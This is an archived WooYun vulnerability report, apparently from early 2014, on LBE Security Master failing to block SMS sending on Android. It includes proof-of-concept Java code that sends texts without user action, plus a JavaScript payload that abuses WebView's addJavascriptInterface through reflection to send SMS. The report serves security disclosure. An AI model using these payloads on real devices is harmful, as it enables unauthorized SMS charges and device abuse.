当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-047381

漏洞标题:LBE手机安全大师主动防御功能缺陷

相关厂商:lbesec.com

漏洞作者: 瘦蛟舞

提交时间:2013-12-31 13:03

修复时间:2014-03-28 13:04

公开时间:2014-03-28 13:04

漏洞类型:设计错误/逻辑缺陷

危害等级:高

自评Rank:10

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-12-31: 细节已通知厂商并且等待厂商处理中
2014-01-05: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-03-01: 细节向核心白帽子及相关领域专家公开
2014-03-11: 细节向普通白帽子公开
2014-03-21: 细节向实习白帽子公开
2014-03-28: 细节向公众公开

简要描述:

LBE手机安全大师主动防御功能缺陷,可能无法拦截软件行为例如发短信、打开wifi等。

详细说明:

事件起源于这个漏洞,原来我一直用的软件居然是纸老虎,伤心。
WooYun: 华为商城安卓客户端存储跨站&强制发短信
然后猜测可能是自己手机是双卡未采用标准api来发送短信,等官方发布等版本吧

LBE安全大师5.1.5446更新日志
更新日期: 2013年,12月 20号
下载
【新增】首款支持隐私空间NFC解锁的安全软件
【新增】适配双卡机型:三星I959、I9502、N9002、I929、P709 华为A199、HTC802w


嗯哼,新版发布了袄支持我的手机啦,再次试了下,居然还是只能提示不能拦截。

漏洞证明:

写个小程序测试下吧。
0x00
api:15||17
phone:i959 android4.2.2
LBE:5.1.5446
0x01
分别使用:标准api、调用短信activity、非标准api、webview代码执行四个方式来发送短信。
部分代码如下:

public void smsSend(View arg0) {

/* PendingIntent pi = PendingIntent.getActivity(MainActivity.this, 0,new Intent(), 0);*/

SmsManager sms = SmsManager.getDefault();
sms.sendTextMessage("10001", null, "105", null, null);
Toast.makeText(MainActivity.this, "oK", Toast.LENGTH_LONG).show();
}


public void smsSend3(View arg3) throws Exception{
sendMessage("10001","103");
Toast.makeText(MainActivity.this, "oK3", Toast.LENGTH_LONG).show();
}


public class MainActivity extends Activity {
EditText url;
WebView show;
WebView myWebView;
@SuppressLint("SetJavaScriptEnabled")
@Override
protected void onCreate(Bundle savedInstanceState) {
super.onCreate(savedInstanceState);
setContentView(R.layout.activity_main);
url = (EditText) findViewById(R.id.url);
myWebView = (WebView) findViewById(R.id.view);
WebSettings webSettings = myWebView.getSettings();
webSettings.setJavaScriptEnabled(true);
myWebView.addJavascriptInterface(new MyObject(this), "my");

}
public boolean onKeyDown(int keyCode, KeyEvent event){
if(keyCode == KeyEvent.KEYCODE_BACK){
String urlStr = url.getText().toString();
myWebView.loadUrl(urlStr);
return true;
}
return false;

}


<script>
var obj_smsManager = my.getClass().forName("android.telephony.SmsManager").getMethod("getDefault",null).invoke(null,null);
obj_smsManager.sendTextMessage("10000",null,"102",null,null);
</script>


0x02
开始测试,直接用sendTextMessage发送短信

Screenshot_2013-12-30-09-51-53[1].png


监控到了哦

Screenshot_2013-12-27-11-52-48[1].png


可以为什么明明拒绝了最后短信还是发送出去了。这都拦不了,感觉没必要往下测了。

Screenshot_2013-12-27-11-53-21[1].png


还是继续测webview漏洞来发送短信依旧和只能监控无法拦截。
0x03
对腾讯手机管家、安全管家、360做了对比测试。果然还是数字公司最给力,全部截下。

修复方案:

null

版权声明:转载请注明来源 瘦蛟舞@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-03-28 13:04

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2014-01-02 13:49 | 4399gdww ( 路人 | Rank:20 漏洞数:4 | )

    mark

  2. 2014-01-22 19:00 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    为什么忽略???

  3. 2014-03-29 20:02 | 卖火柴的小男孩 ( 路人 | Rank:23 漏洞数:4 | muyou)

    程序员不容易呀 忽略了